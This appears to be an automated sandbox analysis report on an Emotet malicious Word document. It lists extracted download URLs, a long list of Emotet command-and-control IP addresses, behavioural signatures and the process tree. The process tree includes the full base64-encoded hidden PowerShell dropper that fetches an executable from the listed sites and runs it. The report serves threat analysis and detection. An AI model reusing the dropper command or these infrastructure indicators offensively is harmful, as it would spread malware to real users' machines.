Analysis
-
max time kernel
30s -
resource
win10v191014 -
submitted
11-12-2019 18:09
General
Malware Config
Extracted
http://trendinformatica.eu/arcfabrics/i88ixy9/
http://theomelet.com/wp-content/fQd/
http://kgd898.com/wp-admin/h45mi/
http://idealssschang.com/calendar/60PcB/
http://happiness360degree.com/wp-admin/fj/
Extracted
emotet
110.143.84.202:80
75.80.148.244:80
64.53.242.181:8080
37.59.24.177:8080
66.34.201.20:7080
108.179.206.219:8080
45.56.88.91:443
206.189.112.148:8080
211.63.71.72:8080
178.210.51.222:8080
92.186.52.193:80
195.244.215.206:80
2.38.99.79:80
37.157.194.134:443
206.81.10.215:8080
80.21.182.46:80
80.11.163.139:21
190.56.255.118:80
190.226.44.20:21
173.70.81.77:80
190.12.119.180:443
120.150.246.241:80
110.142.38.16:80
192.241.255.77:8080
181.31.213.158:8080
178.209.71.63:8080
212.186.191.177:80
85.72.180.68:80
181.57.193.14:80
46.105.131.87:80
12.176.19.218:80
86.98.156.239:443
167.71.10.37:8080
116.48.142.21:443
176.31.200.130:8080
45.51.40.140:80
67.225.179.64:8080
110.143.57.109:80
185.159.102.74:80
1.33.230.137:80
212.64.171.206:80
144.139.247.220:80
165.228.24.197:80
188.152.7.140:80
70.175.171.251:80
165.227.156.155:443
5.196.74.210:8080
182.176.132.213:8090
164.68.101.171:80
149.202.153.252:8080
5.88.182.250:80
62.75.187.192:8080
104.131.44.150:8080
12.229.155.122:80
167.114.242.226:8080
107.2.2.28:80
128.65.154.183:443
31.31.77.83:443
98.24.231.64:80
217.160.182.191:8080
87.106.136.232:8080
218.44.21.114:80
190.53.135.159:21
87.230.19.21:8080
91.231.166.126:8080
186.75.241.230:80
197.254.221.174:80
92.222.216.44:8080
209.97.168.52:8080
100.14.117.137:80
183.102.238.69:465
107.170.24.125:8080
104.131.11.150:8080
103.86.49.11:8080
58.171.42.66:8080
108.191.2.72:80
91.73.197.90:80
66.76.63.99:80
210.6.85.121:80
139.130.241.252:443
201.184.105.242:443
45.33.49.124:443
73.11.153.178:8080
78.24.219.147:8080
24.45.193.161:7080
104.236.246.93:8080
50.116.86.205:8080
31.131.182.30:80
31.172.240.91:8080
101.187.134.207:443
212.129.24.79:8080
91.205.215.66:8080
189.209.217.49:80
73.176.241.255:80
101.187.247.29:80
159.65.25.128:8080
167.99.105.223:7080
190.211.207.11:443
190.147.215.53:22
83.136.245.190:8080
169.239.182.217:8080
176.106.183.253:8080
61.197.110.214:80
93.147.141.5:80
87.106.139.101:8080
104.237.155.168:443
209.141.54.221:8080
181.143.194.138:443
59.103.164.174:80
91.242.138.5:80
74.105.102.97:8080
47.156.70.145:80
200.7.243.108:443
201.173.217.124:443
173.13.135.102:80
95.128.43.213:8080
Signatures
-
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
WINWORD.EXEpid process 4924 WINWORD.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
Powershell.exedescription pid process Token: SeDebugPrivilege 4540 Powershell.exe -
Executes dropped EXE 2 IoCs
Processes:
506.exe506.exepid process 4668 506.exe 4360 506.exe -
Checks system information in the registry 2 TTPs 2 IoCs
System information is often read in order to detect sandboxing environments.
Processes:
description ioc Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 4924 WINWORD.EXE -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
SppExtComObj.exePowershell.exe506.exedescription pid process target process PID 4388 wrote to memory of 4520 4388 SppExtComObj.exe SLUI.exe PID 4540 wrote to memory of 4668 4540 Powershell.exe 506.exe PID 4668 wrote to memory of 4360 4668 506.exe 506.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
Powershell.exepid process 4540 Powershell.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
description ioc Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
WINWORD.EXE506.exe506.exepid process 4924 WINWORD.EXE 4668 506.exe 4360 506.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\4320ac63a844d0218ce852cf498b9abca14799f24c8808dc551e3818a544bd68.doc" /o ""1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4924
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
- Suspicious use of WriteProcessMemory
PID:4388 -
C:\Windows\System32\SLUI.exe"C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent2⤵PID:4520
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABHAGsAYgBlAGkAbgBoAG4AZAB4AD0AJwBKAHMAawB0AHoAYgBxAGgAdgBpAHIAaQAnADsAJABHAHIAegBoAHAAaQBsAGMAeQAgAD0AIAAnADUAMAA2ACcAOwAkAFYAZQBnAGsAcAB2AGgAbABjAGUAbwBiAD0AJwBIAHcAaAB5AHcAcQBvAGYAcABtACcAOwAkAE4AbgBkAHMAcgBuAGcAcwBrAHAAdAB1AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABHAHIAegBoAHAAaQBsAGMAeQArACcALgBlAHgAZQAnADsAJABCAHAAeQBzAHMAcgB4AHQAbAA9ACcATQBzAHoAYwBoAGgAbwBsAHoAbwB2AG8AbAAnADsAJABFAG8AZgBpAGMAbwBnAHEAaQA9ACYAKAAnAG4AZQB3AC0AbwBiAGoAZQAnACsAJwBjACcAKwAnAHQAJwApACAAbgBFAFQALgB3AEUAQgBDAEwAaQBFAG4AVAA7ACQAUwBhAHcAawB2AHkAYwBrAHgAegBzAD0AJwBoAHQAdABwADoALwAvAHQAcgBlAG4AZABpAG4AZgBvAHIAbQBhAHQAaQBjAGEALgBlAHUALwBhAHIAYwBmAGEAYgByAGkAYwBzAC8AaQA4ADgAaQB4AHkAOQAvACoAaAB0AHQAcAA6AC8ALwB0AGgAZQBvAG0AZQBsAGUAdAAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGYAUQBkAC8AKgBoAHQAdABwADoALwAvAGsAZwBkADgAOQA4AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBoADQANQBtAGkALwAqAGgAdAB0AHAAOgAvAC8AaQBkAGUAYQBsAHMAcwBzAGMAaABhAG4AZwAuAGMAbwBtAC8AYwBhAGwAZQBuAGQAYQByAC8ANgAwAFAAYwBCAC8AKgBoAHQAdABwADoALwAvAGgAYQBwAHAAaQBuAGUAcwBzADMANgAwAGQAZQBnAHIAZQBlAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBmAGoALwAnAC4AIgBzAHAATABgAEkAVAAiACgAJwAqACcAKQA7ACQAUQB2AGYAcABwAHUAagBoAHQAcgA9ACcATAB4AGUAagBhAHgAegB1AGcAdwAnADsAZgBvAHIAZQBhAGMAaAAoACQAQQBxAGkAdwBvAGUAbABiAGwAIABpAG4AIAAkAFMAYQB3AGsAdgB5AGMAawB4AHoAcwApAHsAdAByAHkAewAkAEUAbwBmAGkAYwBvAGcAcQBpAC4AIgBEAGAAbwBgAHcAbgBMAE8AQQBEAEYASQBgAEwAZQAiACgAJABBAHEAaQB3AG8AZQBsAGIAbAAsACAAJABOAG4AZABzAHIAbgBnAHMAawBwAHQAdQApADsAJABZAGEAYQBiAHQAZwBhAG0AaQA9ACcAQwBuAHYAdQBjAGMAawBnACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQBJACcAKwAnAHQAZQAnACsAJwBtACcAKQAgACQATgBuAGQAcwByAG4AZwBzAGsAcAB0AHUAKQAuACIATABgAGUATgBHAFQASAAiACAALQBnAGUAIAAyADgANQAzADQAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwBgAFQAYQByAHQAIgAoACQATgBuAGQAcwByAG4AZwBzAGsAcAB0AHUAKQA7ACQAQwBvAHYAZgB1AHEAbQBwAGMAdQBoAHgAcgA9ACcASQBvAG4AcQBhAGIAYwB3AGIAdgBlAGQAJwA7AGIAcgBlAGEAawA7ACQAVwBwAGMAbgBiAHkAbQBmAG8AbABrAGEAPQAnAEYAdQBxAGUAZgBpAHUAdgB0ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFcAegByAHQAagBxAG0AcAB4AGcAZQBmAD0AJwBRAGgAYwBhAGIAZwBhAGgAdwBxAGgAJwA=1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
PID:4540 -
C:\Users\Admin\506.exe"C:\Users\Admin\506.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
- Suspicious use of SetWindowsHookEx
PID:4668 -
C:\Users\Admin\506.exe--dec732193⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4360
-
-